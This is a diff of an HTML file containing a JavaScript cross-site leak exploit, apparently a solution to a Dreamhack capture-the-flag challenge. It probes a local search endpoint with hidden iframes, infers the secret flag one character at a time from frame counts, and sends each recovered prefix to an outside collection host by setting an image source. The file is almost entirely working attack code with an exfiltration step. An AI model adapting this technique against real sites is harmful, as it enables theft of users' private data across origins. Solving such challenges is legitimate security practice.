--- a/static/js/test.html
+++ b/static/js/test.html
@@ -1,43 +1,53 @@
 <iframe id="iframe"></iframe>
 <img id="img">
 <script>
-    async function search(query){
-        return new Promise((resolve, reject)=>{
+    async function search(query) {
+        return new Promise((resolve) => {
             let iframe = document.createElement("iframe");
             iframe.src = "http://127.0.0.1:8000/search?query=" + query;
+            iframe.style.display = "none";
             document.body.appendChild(iframe);
+            let removed = false;
+
+            function removeIframe() {
+                if (!removed) {
+                    removed = true;
+                    document.body.removeChild(iframe);
+                }
+            }
 
             iframe.onload = () => {
-                try{
+                try {
                     let result = iframe.contentWindow.frames.length;
-                    document.body.removeChild(iframe);
+                    removeIframe();
                     resolve(result > 0);
-                }
-                catch(e){
-                    document.body.removeChild(iframe);
+                } catch (e) {
+                    removeIframe();
                     resolve(false);
                 }
             };
 
             setTimeout(() => {
-                document.body.removeChild(iframe);
+                removeIframe();
                 resolve(false);
             }, 1000); // 1초 타임아웃 설정
         });
     }
 
-    async function exploit(){
+    async function exploit() {
         let chars = "0123456789abcdef}";
         let secret = "DH{";
 
-        while(!secret.includes("}")){
-            let promise = chars.split("").map(c => search(secret + c).then(result => ({char: c, success: result})));
-            let results = await Promise.all(promise);
+        while (!secret.includes("}")) {
+            let promises = chars.split("").map(c =>
+                search(secret + c).then(result => ({ char: c, success: result }))
+            );
+            let results = await Promise.all(promises);
 
             let found = false;
 
-            for (let rslt of results){
-                if(rslt.success){
+            for (let rslt of results) {
+                if (rslt.success) {
                     secret += rslt.char;
                     found = true;
                     img.src = `https://oczkhvm.request.dreamhack.games/${secret}`;
@@ -45,12 +55,12 @@
                 }
             }
 
-            if(!found){
-                throw new Error("Not found");
+            if (!found) {
                 img.src = `https://oczkhvm.request.dreamhack.games/failed`;
+                throw new Error("Not found");
             }
         }
     }
 
-    exploit()
+    exploit();
 </script>
